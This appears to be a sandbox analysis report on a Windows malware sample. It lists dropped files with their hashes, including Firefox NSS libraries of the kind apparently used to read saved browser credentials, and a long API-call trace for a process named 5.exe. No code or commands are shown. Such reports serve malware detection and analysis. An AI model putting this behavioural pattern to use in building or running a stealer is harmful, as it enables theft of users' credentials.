C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-string-l1-1-0.dll 17.80 KB MD5: 12cc7d8017023ef04ebdd28ef9558305
SHA1: f859a66009d1caae88bf36b569b63e1fbdae9493
SHA256: 7670fdede524a485c13b11a7c878015e9b0d441b7d8eb15ca675ad6b9c9a7311
SSDeep: 384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-sysinfo-l1-1-0.dll 18.80 KB MD5: 19a40af040bd7add901aa967600259d9
SHA1: 05b6322979b0b67526ae5cd6e820596cbe7393e4
SHA256: 4b704b36e1672ae02e697efd1bf46f11b42d776550ba34a90cd189f6c5c61f92
SSDeep: 384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-timezone-l1-1-0.dll 17.80 KB MD5: babf80608fd68a09656871ec8597296c
SHA1: 33952578924b0376ca4ae6a10b8d4ed749d10688
SHA256: 24c9aa0b70e557a49dac159c825a013a71a190df5e7a837bfa047a06bba59eca
SSDeep: 384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-conio-l1-1-0.dll 18.80 KB MD5: 6ea692f862bdeb446e649e4b2893e36f
SHA1: 84fceae03d28ff1907048acee7eae7e45baaf2bd
SHA256: 9ca21763c528584bdb4efebe914faaf792c9d7360677c87e93bd7ba7bb4367f2
SSDeep: 384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-convert-l1-1-0.dll 21.80 KB MD5: 72e28c902cd947f9a3425b19ac5a64bd
SHA1: 9b97f7a43d43cb0f1b87fc75fef7d9eeea11e6f7
SHA256: 3cc1377d495260c380e8d225e5ee889cbb2ed22e79862d4278cfa898e58e44d1
SSDeep: 384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-locale-l1-1-0.dll 18.30 KB MD5: a2f2258c32e3ba9abf9e9e38ef7da8c9
SHA1: 116846ca871114b7c54148ab2d968f364da6142f
SHA256: 565a2eec5449eeeed68b430f2e9b92507f979174f9c9a71d0c36d58b96051c33
SSDeep: 192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-runtime-l1-1-0.dll 22.30 KB MD5: 41a348f9bedc8681fb30fa78e45edb24
SHA1: 66e76c0574a549f293323dd6f863a8a5b54f3f9b
SHA256: c9bbc07a033bab6a828ecc30648b501121586f6f53346b1cd0649d7b648ea60b
SSDeep: 384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-string-l1-1-0.dll 22.94 KB MD5: 404604cd100a1e60dfdaf6ecf5ba14c0
SHA1: 58469835ab4b916927b3cabf54aee4f380ff6748
SHA256: 73cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c
SSDeep: 384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/nss3.dll 1.19 MB MD5: 556ea09421a0f74d31c4c0a89a70dc23
SHA1: f739ba9b548ee64b13eb434a3130406d23f836e3
SHA256: f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb
SSDeep: 24576:XDI7I4/FeoJQuQ3IhXtHfjyqgJ0BnPQAib7/12bg2JSna5xfg0867U4MSpu731hn:uQ3YX5jyqgynPkbd24VwMSpu7Fhn
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/mozglue.dll 135.95 KB MD5: 9e682f1eb98a9d41468fc3e50f907635
SHA1: 85e0ceca36f657ddf6547aa0744f0855a27527ee
SHA256: 830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d
SSDeep: 3072:8Oqe98Ea4usvd5jm6V0InXx/CHzGYC6NccMmxK3atIYHD2JJJsPyimY4kQkE:Vqe98Evua5Sm0ux/5YC6NccMmtXHD2JR
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/vcruntime140.dll 81.82 KB MD5: 7587bf9cb4147022cd5681b015183046
SHA1: f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256: c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SSDeep: 1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-stdio-l1-1-0.dll 23.80 KB MD5: fefb98394cb9ef4368da798deab00e21
SHA1: 316d86926b558c9f3f6133739c1a8477b9e60740
SHA256: b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7
SSDeep: 384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-math-l1-1-0.dll 28.30 KB MD5: 8b0ba750e7b15300482ce6c961a932f0
SHA1: 71a2f5d76d23e48cef8f258eaad63e586cfc0e19
SHA256: bece7bab83a5d0ec5c35f0841cbbf413e01ac878550fbdb34816ed55185dcfed
SSDeep: 384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-time-l1-1-0.dll 20.30 KB MD5: 849f2c3ebf1fcba33d16153692d5810f
SHA1: 1f8eda52d31512ebfdd546be60990b95c8e28bfb
SHA256: 69885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d
SSDeep: 384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-utility-l1-1-0.dll 18.30 KB MD5: b52a0ca52c9c207874639b62b6082242
SHA1: 6fb845d6a82102ff74bd35f42a2844d8c450413b
SHA256: a1d1d6b0cb0a8421d7c0d1297c4c389c95514493cd0a386b49dc517ac1b9a2b0
SSDeep: 192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
False
C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp 18.00 KB MD5: 29844404ae855e9df054833f71888eb1
SHA1: 3e86f08def08fc14ddec0227d0643319562666db
SHA256: c381401ea96dfe9b926126dcbbc0dd6ab541dbf549732cc6c66f20096b1f663e
SSDeep: 24:LLijhJ0KL7G0TMJHUyyJtmCm0u6lOKQAE9V8FsffDVOzeCmly6UwcTa/HMQW:wz+JH3yJUhJCVE9V8FsXhFlNU1Ts3W
False
C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp 7.00 KB MD5: 0111897c22e2ab86bfd65ccf91adc717
SHA1: c499d8febec0f0cb771a654fc65699c22226fe37
SHA256: cff896f26e26cdf1a63e312f89795366ee2bc902323cabe44a86aa4ad0977228
SSDeep: 48:tNecVTgPOpEveoJZFrU10WB58PdJAKr1EcO:tVSNDX25E
False
C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp 512.00 KB MD5: ca84b062330bf89c92f6da9fbd818b9e
SHA1: f52fd559629cecf4a02037663c6d9bf171ac7235
SHA256: 3ce8414a491044fca9d5c4de1af15fc54c06ba021a7ba2199e092f35c42fbdf4
SSDeep: 48:DML4nwTqMXQ98wM6ckr3ekPokj+rU+D0KHhS0wy:Dbn39e8DdPHaB33
False
C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-shm 32.00 KB MD5: b7c14ec6110fa820ca6b65f5aec85911
SHA1: 608eeb7488042453c9ca40f7e1398fc1a270f3f4
SHA256: fd4c9fda9cd3f9ae7c962b0ddf37232294d55580e1aa165aa06129b8549389eb
SSDeep: 3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
False
C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp 68.00 KB MD5: 3067eb8025ae0262c7a5c681d7982d67
SHA1: 534976f915f2dd49adcf09677f9d38a0d0cfee63
SHA256: 9260dd9c2b2253e0a886f4d66e22c561d23604fe0010bbac8240f8fdc3aaf945
SSDeep: 96:byNQIoYnMvqyWx7pnqH+w/fVIrECuKdPraBdUDBBVWqwmKT/WTPepeWbtxYB+tCX:blkMvuzzTP6btWutle
False
C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp 100.00 KB MD5: 3c72a569901a8a45018d9d7c542a1857
SHA1: 9bb7a9a87b5a8b7c4c556b8271d4af0373911389
SHA256: 06bb2bfe3a0612482499e0b0f175b85b66c9f4d32e6b700d740ea801ea9c764e
SSDeep: 96:rZLJLdogEU+08l50etKCpjjJwCJA+ETzgcc+8EyZ/cCzwwC+AbIN0NAm:tJdogD+0O5rKC5ti5yDe
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-private-l1-1-0.dll 71.30 KB MD5: 9910a1bfdc41c5b39f6af37f0a22aacd
SHA1: 47fa76778556f34a5e7910c816c78835109e4050
SHA256: 65ded8d2ce159b2f5569f55b2caf0e2c90f3694bd88c89de790a15a49d8386b9
SSDeep: 1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-process-l1-1-0.dll 18.80 KB MD5: 8d02dd4c29bd490e672d271700511371
SHA1: f3035a756e2e963764912c6b432e74615ae07011
SHA256: c03124ba691b187917ba79078c66e12cbf5387a3741203070ba23980aa471e8b
SSDeep: 192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/nssdbm3.dll 90.45 KB MD5: 569a7a65658a46f9412bdfa04f86e2b2
SHA1: 44cc0038e891ae73c43b61a71a46c97f98b1030d
SHA256: 541a293c450e609810279f121a5e9dfa4e924d52e8b0c6c543512b5026efe7ec
SSDeep: 1536:5vNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41ZH:hNGVOiBZbcGmxXMcBqmzoCUZoZebHZMw
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/softokn3.dll 140.95 KB MD5: 67827db2380b5848166a411bae9f0632
SHA1: f68f1096c5a3f7b90824aa0f7b9da372228363ff
SHA256: 9a7f11c212d61856dfc494de111911b7a6d9d5e9795b0b70bbbc998896f068ae
SSDeep: 3072:zAf6suip+z7FEk/oJz69sFaXeu9CoT2nIZvetBWqIBoE9Mv:Q6PpsF4CoT2EeY2eMv
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/ucrtbase.dll 1.09 MB MD5: d6326267ae77655f312d2287903db4d3
SHA1: 1268bef8e2ca6ebc5fb974fdfaff13be5ba7574f
SHA256: 0bb8c77de80acf9c43de59a8fd75e611cc3eb8200c69f11e94389e8af2ceb7a9
SSDeep: 24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
False
Threads
Thread 0xa3c
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.DLL, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocalTime, address_out = 0x76c35aa6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessId, address_out = 0x76c5cf04 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessWorkingSetSize, address_out = 0x76cbe359 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UpdateResourceW, address_out = 0x76cc3475 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalExit, address_out = 0x76cb2d37 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x76c31886 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76c314e9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x76c4ce2e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76c33f5c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetThreadPriorityBoost, address_out = 0x76cb43cf True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x76c37a2f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x76c3492b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76c3588e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessIoCounters, address_out = 0x76cb3116 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76c353c6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76c317d1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76c310ff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSetInformation, address_out = 0x76c35651 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x76c34a2d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x76c3cb29 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x76c31400 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Module Load module_name = ADVAPI32.dll, base_address = 0x74d40000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeAcl, address_out = 0x74d545cd True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = MapGenericMask, address_out = 0x74d67a73 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeNameW, address_out = 0x74d81fab True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ReportEventW, address_out = 0x74d4c839 True 1
Module Load module_name = GDI32.dll, base_address = 0x75ad0000 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = EnumEnhMetaFile, address_out = 0x75af5948 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetEnhMetaFileHeader, address_out = 0x75af59f0 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetMapperFlags, address_out = 0x75af2613 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = StretchDIBits, address_out = 0x75ae7435 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SwapBuffers, address_out = 0x75b159fb True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetGraphicsMode, address_out = 0x75aec182 True 1
Module Load module_name = MSIMG32.dll, base_address = 0x74060000 True 1
Module Get Address module_name = c:\windows\syswow64\msimg32.dll, function = TransparentBlt, address_out = 0x74061320 True 1
Module Get Address module_name = c:\windows\syswow64\msimg32.dll, function = AlphaBlend, address_out = 0x74061210 True 1
Module Load module_name = USER32.dll, base_address = 0x74f40000 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMenuInfo, address_out = 0x74f7c151 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadImageA, address_out = 0x74f68455 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyIcon, address_out = 0x74f649b2 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74f61341 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetPropA, address_out = 0x74f67b5a True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CopyImage, address_out = 0x74f64a09 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = FindWindowW, address_out = 0x74f598fd True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextExW, address_out = 0x74f6149e True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x74f61361 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetScrollRange, address_out = 0x74f7d50b True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDC, address_out = 0x74f572c4 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetPropA, address_out = 0x74f6822c True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageA, address_out = 0x74f65f74 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowScrollBar, address_out = 0x74f64162 True 1
Module Load module_name = WINHTTP.dll, base_address = 0x74000000 True 1
Module Get Address module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpQueryHeaders, address_out = 0x7400ba51 True 1
Module Get Address module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpQueryAuthSchemes, address_out = 0x74034101 True 1
Module Get Address module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpCloseHandle, address_out = 0x74002c01 True 1
System Get Time type = System Time, time = 2019-03-24 16:36:38 (UTC) True 1
System Get Time type = Ticks, time = 121462 True 1
System Get Time type = Performance Ctr, time = 18375974385 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
File Open filename = STD_INPUT_HANDLE True 1
File Open filename = STD_OUTPUT_HANDLE True 1
File Open filename = STD_ERROR_HANDLE True 1
Environment Get Environment String - True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 260 True 1
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x76c579f9 True 1
System Get Time type = Local Time, time = 2019-03-25 03:36:38 (Local Time) True 135
File Get Info filename = STD_ERROR_HANDLE, type = size, size_out = 8383776169708 False 1
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
File Get Info filename = STD_ERROR_HANDLE, type = size, size_out = 8383776169708 False 248
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76c349d7 True 1
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76c3435f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76c33519 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x76c31b00 True 1
System Get Info type = Operating System True 1
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77162c42 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x76c32d3c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x76c3168c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x76c34467 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetThreadLocale, address_out = 0x76c335cf True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
